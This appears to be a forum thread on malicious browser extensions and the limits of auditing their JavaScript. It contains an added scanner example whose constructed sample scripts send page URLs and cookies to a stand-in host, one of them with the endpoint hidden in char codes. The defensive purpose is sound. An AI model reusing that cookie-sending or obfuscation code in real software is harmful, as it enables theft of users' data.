by userbinator 4087 days ago
Aren't extensions written in JavaScript? That alone sounds like it'd make it pretty easy to examine and remove any "unwanted functionality" from one, or to show that it's doing something it shouldn't be. It only takes one knowledgeable user to find out and spread the news...

As an aside, I'm surprised at how willing most users seem to be to install any software, be it browser extensions or random apps on their phones/tablets/PCs. Especially in the case of deliberately malicious extensions mentioned in the article, I wonder if they were installed without the user ever considering "What is this for? Do I really need it?"


It's easy to examine once, but once you grant permissions, the author can silently push out a malicious update at any time. I really wish there was a way to disable auto update on an extension by extension basis.

> Aren't extensions written in JavaScript? That alone sounds like it'd make it pretty easy to examine and remove any "unwanted functionality" from one

How? One of the biggest offenders is extensions whose expected behavior is to send large amounts of data to a remote server to be used on your behalf, but which then actually use the information for other purposes, sell it to others, etc.

Examining the client side JS will never tell you what the back end is doing with the data, only what data is transferred, and so won't identify this kind of nefarious behavior at all.
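To make the point above concrete, here is a small static triage pass of the kind a reviewer can actually run over an extension's scripts. It is an added example, not code from this thread or from any real extension; the sample scripts, the endpoint host and the "price comparison" framing are all constructed for illustration. It lists the network sinks, the sensitive page data the script touches, and the URL string literals, which is roughly everything reading the client side can tell you: where the data goes, not what the server does with it afterwards.

```javascript
// Added example (not from the thread): static triage of an extension script.
// It reports network sinks, sensitive data sources and literal endpoints.
// Everything below the scanner is constructed sample input.

const SINK_PATTERNS = [
  { name: "fetch", re: /\bfetch\s*\(/g },
  { name: "XMLHttpRequest", re: /\bXMLHttpRequest\b/g },
  { name: "sendBeacon", re: /\bsendBeacon\s*\(/g },
  { name: "WebSocket", re: /\bWebSocket\s*\(/g },
];

// Page data an extension has no obvious reason to ship off-box.
const SENSITIVE_SOURCES = [
  { name: "document.cookie", re: /\bdocument\.cookie\b/g },
  { name: "location.href", re: /\blocation\.href\b/g },
  { name: "localStorage", re: /\blocalStorage\b/g },
  { name: "chrome.tabs", re: /\bchrome\.tabs\b/g },
];

// Quoted http(s) URLs. Only catches endpoints that exist as literals.
const URL_LITERAL = /["'`](https?:\/\/[^"'`\s]+)["'`]/g;

// Returns { sinks, sources, endpoints } for one script's source text.
function triage(source) {
  const hits = (re) => (source.match(re) || []).length > 0;
  const sinks = SINK_PATTERNS.filter((p) => hits(p.re)).map((p) => p.name);
  const sources = SENSITIVE_SOURCES.filter((p) => hits(p.re)).map((p) => p.name);
  const endpoints = [...source.matchAll(URL_LITERAL)].map((m) => new URL(m[1]).host);
  return { sinks, sources, endpoints: [...new Set(endpoints)] };
}

// Constructed sample 1: readable content script that posts the page URL,
// title and cookies to a hypothetical collection host.
const ENDPOINT = "https://telemetry.example-extension.invalid/collect";
const SAMPLE_READABLE = `
const payload = {
  url: location.href,
  title: document.title,
  cookies: document.cookie,
};
fetch("${ENDPOINT}", { method: "POST", body: JSON.stringify(payload) });
`;

// Constructed sample 2: the same script minified. Identifiers shrink but
// the string literal survives, so the scan still recovers the host.
const SAMPLE_MINIFIED =
  `const p={url:location.href,title:document.title,cookies:document.cookie};` +
  `fetch("${ENDPOINT}",{method:"POST",body:JSON.stringify(p)});`;

// Constructed sample 3: the endpoint is rebuilt at runtime from char codes.
// Same behaviour, but a literal scan sees no URL at all; only the sink and
// the cookie read remain visible.
const CODES = Array.from(ENDPOINT, (c) => c.charCodeAt(0)).join(",");
const SAMPLE_OBFUSCATED =
  `const u=[${CODES}].map(c=>String.fromCharCode(c)).join("");` +
  `fetch(u,{method:"POST",body:document.cookie});`;

const REPORT = {
  readable: triage(SAMPLE_READABLE),
  minified: triage(SAMPLE_MINIFIED),
  obfuscated: triage(SAMPLE_OBFUSCATED),
};

for (const [name, r] of Object.entries(REPORT)) {
  console.log(name, JSON.stringify(r));
}
```

The readable and minified samples yield the same report: a `fetch` sink, `location.href` and `document.cookie` as sources, and one endpoint host. The obfuscated sample keeps the sink and the cookie read but reports no endpoint, which is the practical limit of this kind of check; for the host you would need to run the script and watch the network, and even then the server's use of the data stays invisible.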

>That alone sounds like it'd make it pretty easy to examine and remove

Minified and obfuscated JavaScript is not much easier to check than binary files, and more difficult than e.g. Java class files, at least without ProGuard.

Just as a reference, you might like this tool - I've gotten great results with some really gnarly minified/obfuscated JS.

http://www.jsnice.org/

Oh there is a built in version in the Chrome debugger.

And it can sure handle js uglify, etc. There are tools and systems that allow you to remove more than that, and then it becomes really difficult to get a handle on WTF is going on.

Sure, but this one is much more advanced than the one in the Chrome Inspector, which only formats. This one renames variables and functions, adds comments, and even annotates types.

There are lots of potential explanations which don't involve stupidity. Users may mistakenly assume apps/extensions are nowadays sufficiently sandboxed. Users may also be assuming that the Chrome Web Store is a somewhat reputable marketplace with any malicious software weeded out.

Tons of extensions serve the purpose of modifying actual pages to change/modify/add content. When users have many extensions, it's near impossible to determine which one is the bad actor without a lot of leg work. But people do figure it out and spread the news exactly how you describe. The problem is most people don't read the reviews, and most casual internet users have no idea what's wrong if the functionality is added after the fact.